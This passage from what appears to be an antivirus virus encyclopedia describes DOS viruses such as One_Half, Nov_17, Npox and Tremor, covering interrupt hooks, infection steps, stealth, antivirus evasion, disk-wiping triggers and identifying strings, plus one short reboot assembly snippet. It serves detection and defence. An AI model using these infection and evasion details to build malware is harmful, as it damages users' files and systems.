  30269. Virus Length: At the range between 1268-1282
  30270. Virus Memory Type: High Memory
  30271. Place of Origin:
  30272.  
  30273. PC Vectors Hooked: Int 21h, Int 1Ch
  30274.  
  30275. Infection Procedure:
  30276. 1) Loads itself onto the high memory, allocating approximately 1552
  30277.    bytes.
  30278. 2) Infects *.COM files. Copies the virus code to the host program.
  30279.    Loads the virus first before running the host program.
  30280. 3) While memory resident, the virus infects all opened COM files.
  30281.  
  30282. The virus code is transferred to the allocated memory space using Int
  30283. 21 (4A). The allocation space setting is determined by checking the
  30284. memory from high to low using Int 21 (5801). The virus also uses the
  30285. Int 1c handler to take note of the timer tick, possibly using it for
  30286. some payload.
  30287.  
  30288. Basically, the virus reacts by transferring its code to the high memory
  30289. before actually attaching it to the code itself. The virus calls string
  30290. "STAC," but it is uncertain if the other strings are displayed.
  30291.  
  30292. Symptom: May display
  30293.  
  30294.     "STAC"
  30295.     "Sleepwalker. (c) Optus 1993."
  30296.  
  30297. which appears in the virus code.
  30298.  
  30299. Detection method: Check for the above string.
  30300.  
  30301. [Alfon]
  30302. Virus Name: ALFO1344
  30303. Virus Type: File Virus
  30304. Virus Length: 1344-1426 bytes
  30305. Virus Infect Type: .COM and .EXE files
  30306. Virus Re-infect: No
  30307. Virus Memory Type: Memory resident, MCB type
  30308. Place of Origin:
  30309.  
  30310. PC Vectors Hooked: INT 21h
  30311.  
  30312. Infection Procedure:
  30313. The virus infects both .COM and .EXE files. It infects .COM files by
  30314. moving the host program lower and attaching the whole virus program at
  30315. the beginning of the file. It's opposite with the .EXE file infection
  30316. wherein the attachment of the virus program is normal or attaches its
  30317. program at the end of the host program. The host program's file size
  30318. increases by 1344 bytes for .EXE files while 1426 bytes for .COM files
  30319. after infection.
  30320.  
  30321. The virus first detects if a file is already infected. If it is, it
  30322. leaves the file behind. If it isn't, it infects it by allocating
  30323. memory after the resident part of COMMAND.COM and copying its program
  30324. to that location. It then hooks INT 21H by changing its vector to its
  30325. program at 17F8:01CF. Upon executing the interrupt's service 4BH, it
  30326. attaches its program through the interrupt services of INT 3H which
  30327. holds the original vector of INT 21H. After attaching its program to
  30328. the host it returns to its memory resident program at 17F7:0000 to
  30329. infect other loading and executing files.
  30330.  
  30331. Symptom: Increase in file size by 1344 bytes (for .EXE) and 1426 bytes
  30332. (for .COM).
  30333.  
  30334. [HLLO.Beeper]
  30335. Virus Type: File Virus
  30336. Other Name:
  30337. Virus Length:
  30338. Virus Infect Type: EXE files
  30339. Virus Reinfect Type: Non-Resident
  30340. Place of Origin:
  30341. Virus Memory Type:
  30342.  
  30343. PC Vectors Hooked:
  30344.  
  30345. Infection Procedure:
  30346. When an infected file is executed, three EXE files will be
  30347. infected, copying their filenames and changing their extensions
  30348. to .COM. For every infected file, when executed, at most three EXE
  30349. files get infected.
  30350.  
  30351. This enables the virus code to execute first before the
  30352. original EXE file.
  30353.  
  30354. [One_Half.3544]
  30355. Virus Status:
  30356. Origin:
  30357. Eff Length: 3500-5500 bytes
  30358. Virus Type: Polymorphic Virus
  30359.  
  30360. Symptoms :
  30361. Increase in the size of infected COM and EXE files by 3544 bytes
  30362. and decrease in available memory by 5120 bytes.  Executing
  30363. programs may slow down due to the infection procedure of the virus.
  30364.  
  30365. General Comments:
  30366. One-Half is a multipartite, polymorphic virus.  It will first infect
  30367. the boot sector of a hard disk and it will only be memory resident
  30368. if the hard disk is used for booting.  During bootup, it will allocate
  30369. 5120 bytes of the memory and will reside in the High Memory Area. It
  30370. will then hook INT 21, INT 13, and INT 1C.
  30371.  
  30372. All COM and EXE files executed, opened or copied will be infected by
  30373. the virus and will increase by 3544 bytes.
  30374.  
  30375. The virus is also capable of hiding itself from anti-virus software.
  30376. It can also hide the increase in the file size 'cause it adds special
  30377. codes to check for infected files and modifies their file size when
  30378. viewed.
  30379.  
  30380. One-Half encrypts an area of the hard disk every time it starts up.
  30381. This means that it slowly encrypts all the data in your hard disk.
  30382. Though these areas are decrypted back when the virus is memory
  30383. resident, it is advisable to create a backup copy of important
  30384. files while the virus is still memory resident.  This makes the
  30385. virus hard to remove because it hides its encryption code encrypted
  30386. in the Boot Record.
  30387.  
  30388. The following messages are found in the decrypted virus code:
  30389.  
  30390.          "Dis is one half."
  30391.          "Press any key to continue"
  30392.          "Did you Leave the room?"
  30393.  
  30394. [One_Half.3570]
  30395. Virus Name: ONEH3570
  30396. Alias: ONE-HALF.3570
  30397. Origin:
  30398. Eff Length: 3500-5500 bytes
  30399. Virus Type: Polymorphic Virus
  30400.  
  30401. Symptoms :
  30402. Increase in the size of infected COM and EXE files by 3570 bytes
  30403. and decrease in available memory by 5120 bytes.  Executing
  30404. programs may slow down due to the infection procedure of the virus.
  30405. Data sometimes turn out as garbage due to the virus encryption.
  30406.  
  30407. General Comments:
  30408. One-half.3570 is a multipartite, polymorphic virus which is a variant
  30409. of the One-Half.3544. It will first infect the boot sector of a hard
  30410. disk and it will only be memory resident if the hard disk is used for
  30411. booting. During bootup, it will allocate 5120 bytes of the memory and
  30412. will reside in the High Memory Area. It will hook INT 21, INT 13, and
  30413. INT 1C.
  30414.  
  30415. All COM and EXE files executed, opened or copied will be infected by
  30416. the virus and will increase by 3544 bytes.
  30417.  
  30418. The virus is also capable of hiding itself from anti-virus software.
  30419. It can also hide the increase in the file size by adding special
  30420. codes to check for infected files and modifying their sizes when
  30421. viewed.
  30422.  
  30423. One-Half encrypts an area of the hard disk every time it starts up.
  30424. This means that it slowly encrypts all the data in your hard disk.
  30425. Though these areas are decrypted back when the virus is memory
  30426. resident, it is advisable to create a backup copy of important
  30427. files while the virus is still memory resident.  This makes one-
  30428. half hard to remove because it hides its encryption code encrypted
  30429. in the Boot Record.
  30430.  
  30431. The following messages are found in the decrypted virus code:
  30432.  
  30433.          "Dis is one half."
  30434.          "Press a key"
  30435.          "Did you leave the room?"
  30436.  
  30437. [Unsnared]
  30438. Virus Type: File Virus
  30439. Virus Length: Approximately 814 bytes
  30440. Virus Memory Type: High Memory
  30441. Place of Origin:
  30442.  
  30443. PC Vectors Hooked: Int 21h
  30444.  
  30445. Infection Procedure:
  30446. 1) Loads itself onto the high memory, allocating 1024 bytes (9FC0:0000).
  30447. 2) Moves approximately 814 bytes (032EH) in the high memory.
  30448. 3) Infects *.EXE files. Copies the virus code to the host program,
  30449.    adding approximately 814 (032EH) bytes. Loads the virus first
  30450.    before running the host program.
  30451. 4) While memory resident, the virus infects all opened EXE files.
  30452.  
  30453. The virus reacts ordinarily by allocating space in the memory before
  30454. infecting files. Nothing extraordinary happens. It just attaches its
  30455. code to the host program after it is loaded from the memory.
  30456.  
  30457. Damage:
  30458. 1) Decrease in memory free space.
  30459. 2) Increase in file size.
  30460.  
  30461. [Ant4096B]
  30462. Virus Name: ANT4096B
  30463. Virus Type: File type
  30464. Virus Length: 4096 bytes
  30465. Original Name: INVADER
  30466. Virus Infect Type: .COM and .EXE files
  30467. Virus Re-infect: No
  30468. Virus Memory Type: Memory resident, MCB type
  30469. Place of Origin:
  30470.  
  30471. PC Vectors Hooked: INT 21h, INT 8h, INT 9h
  30472.                    INT 13h
  30473.  
  30474. Infection Procedure:
  30475. The virus infects both .COM and .EXE files. It infects .COM files by
  30476. moving the host program lower and attaching the whole virus program at
  30477. the beginning of the file. It's opposite with the .EXE file infection
  30478. wherein the attachment of the virus program is normal or attaches its
  30479. program at the end of the host program. The host program's file size
  30480. increases by 4096 bytes after infection. The virus program allocates
  30481. 320 paragraphs (5120 bytes) in the lower part of the memory, after the
  30482. resident part of COMMAND.COM, specifically at 17F8:0000. It decrypts
  30483. 424 bytes of its program using XOR 46H. After decrypting it can be
  30484. seen in the data area of the virus program a string saying "by Invader,
  30485. Feng Chiu U., Warning: Don't run ACAD.EXE". Then it hooks INT 21H by
  30486. changing its vectors to 1808:05DF, INT 08H to 1808:01F9, INT 09H to
  30487. 1808:02B8, and INT 13H to 1808:0435. No payload was seen in the
  30488. interrupt hooks. The virus only infects the loaded and executed files.
  30489.  
  30490. Symptom: Infected files increase by 4096 bytes.
  30491.  
  30492. [Ontario-B]
  30493. Alias:
  30494. Origin:
  30495. Eff Length: 1024 bytes
  30496. Virus Type:
  30497.  
  30498. Symptoms :
  30499. Increase in size of COM and EXE programs by 1024 bytes and
  30500. decrease in free memory by 2048 bytes.
  30501.  
  30502. General Comments:
  30503. On the first infection, this virus will first allocate 2048 bytes in
  30504. the High Memory Area and then will transfer 1024 bytes of its code to
  30505. that area. It will then hook INT 21 with infection procedure to
  30506. services 4B00(Execute Program), 3D02(Open File Handle), 11 and 12
  30507. (Find Directory Entries).
  30508.  
  30509. This virus will infect all EXE and COM files that are opened, renamed,
  30510. or executed.  It will also hide infected files when viewed or listed
  30511. using the DIR command.
  30512.  
  30513. There seems to be no damage done by the virus other than replicate.
  30514.  
  30515. [Nov_17]
  30516. Alias: November-17th.800
  30517. Origin:
  30518. Eff Length: 800
  30519. Virus Type: File Virus
  30520.  
  30521. Symptoms :
  30522. Will increase .COM and .EXE files by 800 bytes and will allocate
  30523. 832 bytes in the High Memory Area.
  30524.  
  30525. General Comments:
  30526. On the first infection, this virus checks if the file carrier is .EXE.
  30527. It will infect .COM and .EXE differently because of the difference in
  30528. the structure of the two. It then allocates 832 bytes in the High
  30529. Memory Area and then moves its virus code to HMA.  Then it hooks INT 21,
  30530. with points to services 3D (Open File Handle), 43 (Get/Set File
  30531. Attributes) and 4B00 (Execute Child Process). After this, the virus
  30532. returns control to the original routine.
  30533.  
  30534. This virus will change the attributes of files opened or executed,
  30535. in addition to infecting them, once the virus is memory resident.
  30536.  
  30537. Upon loading, NO-17-800 will check if the system date is between
  30538. November 17 and November 30; if it is, the virus will save the
  30539. system time's hour of day and will always check it until it has
  30540. changed; this is when it will write 8 sectors starting at the 1st
  30541. sector of the default drive.  This will destroy the Boot Record and
  30542. files located in the first 8 sectors of floppy disks while it will
  30543. destroy the Boot Record and the File Allocation Tables of the hard
  30544. disk depending on the default drive of the system.
  30545.  
  30546. This string is found in the virus code:
  30547.  
  30548.        "SCAN.CLEAN.COMEXE"
  30549.  
  30550. [Nov_17th.855.A]
  30551. Alias: NOVEMBER 17-855
  30552. Origin:
  30553. Eff Length: 855
  30554. Virus Type: File Virus
  30555.  
  30556. Symptoms :
  30557. Will increase .COM and .EXE files by 855 bytes and will allocate
  30558. 896 bytes in the High Memory Area.
  30559.  
  30560. General Comments:
  30561. On the first infection, this virus checks if the file carrier is .EXE.
  30562. It will infect .COM and .EXE differently because of the difference in
  30563. the structure of the two. Then it allocates 896 bytes in the High
  30564. Memory Area and then moves its virus code to HMA. It then hooks INT 9
  30565. and INT 21, with points to services 3D (Open File Handle), 43
  30566. (Get/Set File Attributes) and 4B00 (Execute Child Process). After
  30567. this it returns control to the original routine.
  30568.  
  30569. This virus will change the attributes of files opened or executed,
  30570. in addition to infecting them, once the virus is memory resident.
  30571.  
  30572. This is a variant of the NO17-800 virus but the difference is that
  30573. this virus is triggered by the keys pressed and not by time as that of
  30574. NO17-800 virus.  When a certain number of keys are pressed and if the
  30575. system date is between November 17-30, this is when it will write
  30576. 8 sectors starting at the 1st sector of the default drive.  This will
  30577. destroy the Boot Record and files located in the first 8 sectors of
  30578. floppy disks while it will destroy the Boot Record and the File
  30579. Allocation Tables of the hard disk depending on the default drive
  30580. of the system.
  30581.  
  30582. This string is found in the virus code:
  30583.  
  30584.           "SCAN.CLEAN.COMEXE"
  30585.  
  30586. [No_Frills.Dudley]
  30587. Virus Status:
  30588. Origin:
  30589. Eff Length: 1215
  30590. Virus Type: File Virus; Encryption Virus
  30591.  
  30592. Symptoms :
  30593. Will increase .COM and .EXE files by 1215 bytes and will allocate
  30594. 4624 bytes in the High Memory Area.
  30595.  
  30596. General Comments:
  30597. On the first time it is loaded, NOFDUDLY will first decrypt 1153 bytes
  30598. of its code.  Then it will check if it is already loaded in the memory.
  30599. If it is not yet loaded then it will allocate 4624 bytes in the
  30600. High Memory Area.  Then it will transfer all of its 1215 bytes code
  30601. to the High Memory Area.  It will then hook INT 21, adding extra
  30602. codes to services 54 (Get Verify Flag), 4B00 (Execute Program),
  30603. 3D (Open File Handle), 56 (Rename File), and 6C (Extended Open/Create).
  30604. Then it will return control to the original routine.
  30605.  
  30606. When in memory, NOFDUDLY will temporarily hook INT 24 (Critical Error
  30607. Handler) so that it can readily troubleshoot problems if errors
  30608. occurred and then unhook it again.  Then it will infect the command
  30609. interpreter (COMMAND.COM) of the default drive.
  30610.  
  30611. This virus is an enhanced variant of the NOFRILLS virus with an
  30612. additional encryption enhancement to the older variant.
  30613.  
  30614. Text message found in the virus code:
  30615.  
  30616.             "[Oi Dudley] [PuKE]"
  30617.  
  30618. [No_Frills.843]
  30619. Alias: NO FRILLS
  30620. Origin:
  30621. Eff Length: 843
  30622. Virus Type: File Virus
  30623.  
  30624. Symptoms :
  30625. Will increase .COM and .EXE files by 843 bytes and will allocate
  30626. 1536 bytes in the High Memory Area.
  30627.  
  30628. General Comments:
  30629. This virus will first check if the carrier file is .COM or .EXE. It
  30630. will do so to know which code will be transferred to the High
  30631. Memory Area.  It will then allocate 1536 bytes of High Memory Area
  30632. and transfer 400h of its virus code to it.  It will then hook INT 21
  30633. adding extra codes to services 54 (Get Verify Flag), 4B00 (Execute
  30634. Program), 3D (Open File Handle), 43 (Get/Set File Attributes), and 6C
  30635. (Extended Open/Create). Then it will return control to the original
  30636. routine.
  30637.  
  30638. When in memory, NOFRILLS will temporarily hook INT 24 (Critical Error
  30639. Handler) so that it can readily troubleshoot problems if errors
  30640. occurred and then unhook it again.  Then it will infect the command
  30641. interpreter (COMMAND.COM) of the default drive.
  30642.  
  30643. This message is found in the virus code:
  30644.  
  30645.          "+-No Frills 2.0 by Harry McBungus-+"
  30646.  
  30647. [Nomenklatura]
  30648. Virus Status:
  30649. Origin:
  30650. Eff Length: 1024 bytes
  30651. Virus Type:
  30652.  
  30653. Symptoms :
  30654. Increase of 1024 bytes in sizes of EXE and COM files and decrease of
  30655. 1072 in the available memory.  Usually displays disk
  30656. read/write errors like "Sector not found", "Invalid Media Type" and
  30657. other disk related errors.
  30658.  
  30659. General Comments:
  30660. The NOMENKLATURA virus is almost similar to common viruses to date.
  30661. The difference is that it uses INT 2F service 13 (Set Disk Interrupt
  30662. Handler) which is more like an error-trapping procedure for the virus
  30663. when infection of other files is impossible.  It is common to other
  30664. viruses because it will first allocate in the High Memory Area with a
  30665. size of 1072 bytes and then transfer 1055 bytes of it to the high
  30666. memory. The extra bytes loaded by the virus are the addresses of
  30667. specific locations in the Operating System in the memory so it can
  30668. directly access it and also the interrupt vectors of INT 21 and INT 13.
  30669. It also has checking procedures if an executed file is infected or not,
  30670. if it is COM or EXE.  Executable files that are opened and/or executed
  30671. will be infected immediately by this virus.
  30672.  
  30673. This virus was named as such because of the text string found in the
  30674. virus code : "NOMENKLATURA"
  30675.  
  30676. [Cordobes.3334]
  30677. Virus Type:  Polymorphic, File Virus
  30678. Virus Length: 3,333 bytes
  30679. Virus Infect Type: .EXE files
  30680. Virus Re-infect: no
  30681. Virus Memory Type: Memory resident, MCB type
  30682. Place of Origin:
  30683.  
  30684. PC Vectors Hooked: INT 21h
  30685.  
  30686. Infection Procedure:
  30687. The virus only infects .EXE files. The virus infects the host file by
  30688. attaching itself at the end of the file. As a polymorphic virus, it
  30689. first decrypts its code. The virus has a complicated way of decrypting
  30690. its code. The virus allocates 4,128 bytes in the low memory starting
  30691. at 1806:0000 and copies its 3,333 bytes program there to stay resident.
  30692. From there it hooks INT 21H by pointing its vector to its program in
  30693. the low memory at 1816:0BAB. It uses this interrupt to attach itself
  30694. to the loading and executing .EXE files. Once activated by loading and
  30695. executing infected files the virus checks for the current month and
  30696. day. If it is August 10 the virus infects files. Aside from infecting
  30697. .EXE files, it will also search for AUTOEXEC.BAT in drive C:\ and
  30698. append the following:
  30699.  
  30700.         @Echo Virus "EL MOSTRO CORDOBES"
  30701.         @Echo No tema por sus datos. Que pase un buen
  30702.         @Echo.
  30703.         @Pause
  30704.  
  30705. Thus, upon system bootup in drive C:\ the text string above will be
  30706. displayed and will pause until a key is pressed. The same string can
  30707. be seen inside the viral code. Sometimes the virus cannot attach to
  30708. .EXE files completely so the increase in the size of the host file
  30709. after infection is indefinite, and cannot become memory resident.
  30710. The corrupted files will not finish loading and will display "Error
  30711. in EXE file."
  30712.  
  30713. Damage: Corrupts .EXE files.
  30714.  
  30715. Symptom: Will add the above text to the AUTOEXEC.BAT file in drive C:\.
  30716.  
  30717. [Jos]
  30718. Virus Type: File Virus
  30719. Virus Length:
  30720. Virus Infect Type: MBR
  30721. Place of Origin:
  30722. Virus Memory Type:
  30723.  
  30724. PC Vectors Hooked:
  30725.  
  30726. Infection Procedure:
  30727. 1) Moves 21CDh in DS:[FE], 14EBh in DS:[100] and 17h in DS:[11E].
  30728. 2) Loads/executes a program having the control block = 114C:11E and
  30729.    ASCIIZ command line = 114C:0. This procedure is unsuccessful.
  30730. 3) Writes character in teletype mode having 1Eh as the graphics mode,
  30731.    page 1. Displaying :
  30732.  
  30733.          "Beware the Jabberwock, my son!"
  30734.          "The jaws that bite, the claw that catch!"
  30735.  
  30736.          "And hast thou slain the Jabberwock!"
  30737.          "Come to my arms, my beamish boy!"
  30738.  
  30739. 4) Loops with FFFFh as the value of CX (just a delay).
  30740. 5) Executes these codes:
  30741.  
  30742.             MOV GS,DX
  30743.             CLI
  30744.             CLD
  30745.             IN AL,64
  30746.             TEST AL,04
  30747.             JNZ D840
  30748.     D840:   SMSW AX
  30749.             TEST AL,01
  30750.             JZ D84F
  30751.             CLI
  30752.             MOV AL,FE
  30753.             OUT 64,AL
  30754.  
  30755. After performing these codes the machine performs a warm boot.
  30756.  
  30757. Symptom: A message can be seen in address = 114C:0239h
  30758.  
  30759.        "JABBERW OCKY (.) the first Romanian
  30760.            Political Virussian
  30761.            Dhohoho$
  30762.            Released Date 12-22-1990"
  30763.  
  30764. [Npox.963.A]
  30765. Alias: EVIL GENIUS 2.0
  30766. Origin:
  30767. Eff Length: 963 bytes
  30768. Virus Type:
  30769.  
  30770. Symptoms :
  30771. Increase of 963 bytes in sizes of EXE and COM files and decrease
  30772. of 1024 in the available memory.  When in a write-protected floppy,
  30773. it usually displays a "Write Protect Error" message when you try to
  30774. read from it.
  30775.  
  30776. General Comments:
  30777. On the first infection, this virus allocates 1024 bytes in the High
  30778. Memory Area and then transfers its code to the HMA. After that, it
  30779. hooks INT 21 and INT 9 and then returns control back to the original
  30780. routine.
  30781.  
  30782. This text string can be found in the virus code:
  30783.  
  30784.          "Evil Genius V2.0 - RS/NuKE"
  30785.          "C:\COMMAND.COM"
  30786.  
  30787. It will infect COM and EXE files that are loaded, executed or opened
  30788. by other files.  During infection, the file's time and date will not be
  30789. modified except for the seconds count which will be set to :58. This
  30790. is also the virus' signature if a file is already infected.  But
  30791. before infecting files, it checks whether the file is executed by
  30792. another program (i.e., debuggers, anti-virus).  If it is being executed
  30793. by another file then it will check if the file loader has the following:
  30794.  
  30795.       1.)  ****prot.***   (i.e. f-prot, nprot, lprot)
  30796.       2.)  ****scan.***   (i.e. pcscan, scan, viruscan)
  30797.       3.)  ****lean.***   (i.e. clean)
  30798.  
  30799. If the above characteristics are not satisfied then it will infect the
  30800. executed program.
  30801.  
  30802. Once resident, the N-Pox virus will hide the increase in the size of
  30803. infected programs when the user tries to view it (i.e., DIR).  It will
  30804. also modify loaded infected files in the memory so as to hide them from
  30805. anti-virus software.
  30806.  
  30807. The damage that N-Pox does is that if the system date is the 24th of
  30808. any month and if a key is pressed, it will format the first 32 tracks
  30809. of the hard disk, starting from track 0. This will damage the Boot
  30810. Record, File Allocation Tables (FAT) and the system files on the hard
  30811. disk.
  30812.  
  30813. [Cpw.1527]
  30814. Virus Type: Polymorphic, File Virus
  30815. Virus Length: 1,527 bytes
  30816. Virus Infect Type: .EXE and .COM file
  30817. Virus Re-infect: No
  30818. Discovery Date: 1992
  30819. Virus Memory Type: High memory resident
  30820. Place of Origin: Chile
  30821.  
  30822. PC Vectors Hooked: INT 21h
  30823.  
  30824. Infection Procedure:
  30825. The virus infects both .EXE and .COM files. It infects its host file by
  30826. attaching itself at the end of the file. It increases an infected file's
  30827. size by 1,527 bytes. The virus can become memory resident upon loading
  30828. and executing an infected file. As a polymorphic virus it first decrypts
  30829. its code. Then it allocates 1,984 bytes in the high memory starting at
  30830. 9F84:0000. It hooks INT 21H by pointing its vector to its program in the
  30831. high memory at 9F84:0258 to be able to attach itself to loading .EXE and
  30832. .COM files upon opening it. Before infecting a loading executable file,
  30833. it first deletes CHKLIST.CPS, which is an anti-virus file, if it exists.
  30834. Then it infects COMMAND.COM in drive C:\ by attaching itself to the
  30835. file. After infecting C:\COMMAND.COM, it finally infects the loading
  30836. executable  file. During infection, the virus checks for the current
  30837. month, day, and hour. If the current date is September 11 or December
  30838. 28 then it checks for the current hour. The following hour of the day
  30839. will trigger the payload:
  30840.  
  30841.                 0th hour.......(12:00 am)
  30842.                 1st hour.......(1:00 am)
  30843.                 4th hour.......(4:00 am)
  30844.                 6th hour.......(6:00 am)
  30845.                 7th hour.......(7:00 am)
  30846.                 10th hour.......(10:00 am)
  30847.                 11th hour.......(11:00 am)
  30848.                 13th hour.......(1:00 pm)
  30849.                 16th hour.......(4:00 pm)
  30850.                 18th hour.......(6:00 pm)
  30851.                 19th hour.......(7:00 pm)
  30852.                 21st hour.......(9:00 pm)
  30853.  
  30854. The payload deletes the first file entry in the current directory until
  30855. it deletes the currently loaded file. Even though the currently loaded
  30856. file that activated the virus was deleted, the virus still remains
  30857. memory resident, and will continue its payload. The deletion occurs
  30858. every time an executable file is loaded, given that the virus is
  30859. already memory resident. Not all .COM files are infected by the virus.
  30860. Only those that have large file sizes will be infected. As checked from
  30861. DOS CHKDSK the virus occupies 1,792 bytes in the memory or decreases
  30862. the available memory by that size. The following text strings can be
  30863. seen within the virus code:
  30864.  
  30865.         "CPW fue becho en Chile en 1992,"
  30866.         "VIVA CHILE MIERDA!"
  30867.  
  30868. [DR&ET]
  30869. Virus Type:  Polymorphic, File Virus
  30870. Virus Length: 1,710-1,713 bytes
  30871. Virus Infect Type: .COM and .EXE files
  30872. Virus Re-infect: No
  30873. Virus Memory Type: High memory resident
  30874. Place of Origin:
  30875.  
  30876. PC Vectors Hooked: INT 21h
  30877.  
  30878. Infection Procedure:
  30879. The virus infects .COM and .EXE files. It increases an infected file's
  30880. size by 1,710 bytes for .COM file and 1,713 bytes for .EXE file. The
  30881. virus infects the host file by attaching itself at the end of the file.
  30882. The virus can become memory resident upon loading and executing an
  30883. infected file. When memory resident the virus can infect executable
  30884. files when it is opened. The virus uses complex method of decryption.
  30885. After decryption the virus allocates 1,776 bytes in the high memory
  30886. and copies its program there to stay resident. Then it hooks INT 21H
  30887. by changing its vector to point to its program in the high memory at
  30888. 9F92:017A. It uses this interrupt to attach itself to the host file.
  30889. Before attaching to the host file, the virus encrypts its code again
  30890. and then writes itself to the host file.
  30891.  
  30892. During infection, the virus checks for the current day. If it is the
  30893. 13th day of the month it checks for another condition by decrypting
  30894. and comparing data from its data area whose condition is possibly
  30895. known only to the author of the virus. If the 2 conditions are
  30896. satisfied it will execute the payload of overwriting the Master Boot
  30897. Sector of drive C:\ with its own program and replacing the original
  30898. Interrupt Vector Table with its own table. As a result the system
  30899. will hang up during bootup. The date and time attributes of the
  30900. host file after infection are not changed.
  30901.  
  30902. Damage: Corrupts the Master Boot Sector and Interrupt Vector Table.
  30903.  
  30904. Symptom:
  30905. 1) Hangs the system during bootup.
  30906. 2) Increases the file size by 1,710 for .COM files and 1,713 for .EXE
  30907.    files.
  30908.  
  30909. [Trakia.1070]
  30910. Virus Type: File Virus
  30911. Virus Length: Approximately 1076-1084 bytes
  30912. Virus Infect Type: Mutation Virus
  30913. Virus Memory Type: High Memory
  30914. Place of Origin:
  30915.  
  30916. PC Vectors Hooked: Int 21h
  30917.  
  30918. Infection Procedure:
  30919. 1) Loads itself onto the high memory, allocating 1360 bytes (9FAB:0000).
  30920. 2) Moves 1357 (054DH) bytes to the high memory.
  30921. 3) Infects *.COM and *.EXE files. Copies the virus code to the host
  30922.    program, adding approximately 1076 - 1084 bytes. Loads the virus
  30923.    first before running the host program.
  30924.  
  30925. This virus is a mutation virus. When an infected file is executed, it
  30926. will search for *.COM and *.EXE files using Int 21 (4E and 4F), and
  30927. will infect when DTA is set. It only infects files within the current
  30928. directory.
  30929.  
  30930. Damage:
  30931. 1) Free memory decreases.
  30932. 2) Increase in file size. Adds approximately 1076-1084 bytes.
  30933.  
  30934. Symptom: Delay in program execution due to file search.
  30935.  
  30936. Text string: "Files Only (No symbols) .SYM - Load symbol file only.
  30937. No extension - Load program & symbols" appears within the virus code.
  30938.  
  30939. [Predator.2448]
  30940. Virus Status:
  30941. Origin:
  30942. Eff Length: 2448 bytes
  30943. Virus Type: Polymorphic Virus
  30944.  
  30945. Symptoms :
  30946. Increase of 2448 bytes in sizes of EXE and COM files and decrease
  30947. of 6144 bytes in the available memory.
  30948.  
  30949. General Comments:
  30950. This virus is a variant of the PREDATOR-1072 virus.  It will infect
  30951. all EXE and COM files that are executed, opened or copied.  It is
  30952. also memory resident which resides in the High Memory Area.
  30953.  
  30954. During the first infection, it decrypts 2424 bytes of its code and then
  30955. allocates 6144 bytes in the High Memory Area and transfers its code
  30956. there. It also hooks INT 13 and 21.
  30957.  
  30958. This message is found in the encrypted virus code:
  30959.  
  30960.       "Predator Virus #2 (c) 1993 Priest - Phalcon/Skism"
  30961.  
  30962. [Freddy.2.1]
  30963. Virus Type: File Virus
  30964. Other Name:
  30965. Virus Length:
  30966. Place of Origin:
  30967.  
  30968. PC Vectors Hooked: Int 21h
  30969.  
  30970. Infection Procedure:
  30971. 1) Encrypts data to 11D2:0059h to 937h reading:
  30972.    "COMMAND.COM     *.COM    *.EXE       Freddy KRueGer 2.1
  30973.    Hi Fridrik!", thus copying data from 11D2:0059 to 114D:0 to
  30974.    13FFh, hooking interrupt 21.
  30975. 2) Infects COMMAND.COM, COM and EXE files.
  30976.  
  30977. When the virus is loaded it hangs because it searches for the host
  30978. to infect it. Infecting the host, it destroys the file.
  30979.  
  30980. [Tremor-1]
  30981. Virus Type: File Virus
  30982. Virus Length:
  30983. Virus Memory Type: High Memory
  30984. Place of Origin:
  30985. Trigger Condition: Checks if the date is above April 13, or if the
  30986.                    year is above or equal to 1993. If so it executes
  30987.                    the virus code directly.
  30988.  
  30989. PC Vectors Hooked: Int 21h, Int 15h, Int 2Fh
  30990.  
  30991. Infection Procedure:
  30992. 1) Loads itself onto the high memory, allocating approximately
  30993.    4272-4288 bytes.
  30994. 2) Infects *.EXE files. Copies the virus code to the host program,
  30995.    adding approximately 4003 bytes. Loads the virus first before
  30996.    running the host program.
  30997. 3) While memory resident, the virus infects all opened EXE files.
  30998.  
  30999. The virus checks for the system date and time, after the virus code is
  31000. decrypted. The code then checks for the DOS version with reason unknown.
  31001. It continues by getting the process ID of the program, to enable itself
  31002. to set the kind of allocation strategy it wants to do, Int 21 (58).
  31003. After this, the virus checks for the extended memory, Int 21 (43). If
  31004. all needed requirements are set, it begins to modify the memory
  31005. allocation, Int 21 (4A). The virus code is then transferred to the
  31006. high memory, at a size approximately 4003 bytes. When in memory, the
  31007. virus sets the DTA to which it will copy its code.
  31008.  
  31009. Symptom:
  31010. Displays: "-=> T.R.E.M.O.R was done by NEUROBASHER
  31011.              /May-June '92, Germany <=-
  31012.           -MOMENT-OF-TERROR-IS-THE-BEGINNING-OF-LIFE-"
  31013.  
  31014. Infected files run normally. Increase in file size, and occupies
  31015. memory space.
  31016.  
  31017. Detection method: Decrypt the virus code before detection.
  31018.  
  31019. [Troj.1463]
  31020. Virus Type:
  31021. Virus Length: Approximately 1463 bytes
  31022. Virus Memory Type: High Memory
  31023. Place of Origin:
  31024.  
  31025. PC Vectors Hooked: Int 21h
  31026.  
  31027. Infection Procedure:
  31028. 1) Loads itself onto the high memory after decryption, allocating
  31029.    3536 bytes (9F23:0100).
  31030. 2) Moves 1463 (05B7H) bytes to the high memory.
  31031.  
  31032. Does not actually infect files, what it does is load itself resident
  31033. in the high memory and mess up the execution of files. (see Damage
  31034. below)
  31035.  
  31036. Damage: When an infected file is executed while the virus is memory
  31037. resident, two payloads can be detected.
  31038.  
  31039. 1. COM files:
  31040.    When *.COM files are executed while the virus is memory resident,
  31041.    those files will not run.
  31042.  
  31043. 2. EXE files:
  31044.    When *.EXE files are executed while the virus is memory resident,
  31045.    those files will not run, like COM files. But this will only
  31046.    happen once. The second execution of an EXE file will result to
  31047.    a same display, but this time the COMMAND.COM becomes invalid.
  31048.    System becomes useless afterwards.
  31049.  
  31050. Note: Executing a COM file will not suspend itself. But when an EXE
  31051. file is executed after a COM file has been executed, the system will
  31052. then suspend.
  31053.  
  31054. Symptom:
  31055. Text string: "Trojector II, (c) Armagedon Utilities, Athens 1992"
  31056. appears within the decrypted code.
  31057.  
  31058. [Troj.1561]
  31059. Virus Type:
  31060. Virus Length: Approximately 1561 bytes
  31061. Virus Memory Type: High Memory
  31062. Place of Origin:
  31063.  
  31064. PC Vectors Hooked: Int 21h
  31065.  
  31066. Infection Procedure:
  31067. 1) Loads itself onto the high memory after decryption, allocating
  31068.    3744 bytes (9F16:0100).
  31069. 2) Moves 1561 (0619H) bytes to the high memory.
  31070.  
  31071. Does not actually infect any files, but the file executed will not run.
  31072.  
  31073. Damage: While the virus is memory resident, files executed will not run.
  31074.  
  31075. Symptom:
  31076. Text string: "Trojector ]I[, (c) Armagedon Utilities, Athe@"
  31077. appears within the decrypted code.
  31078.  
  31079. [Istanbul-2]
  31080. Virus Type: File Virus
  31081. Virus Length:
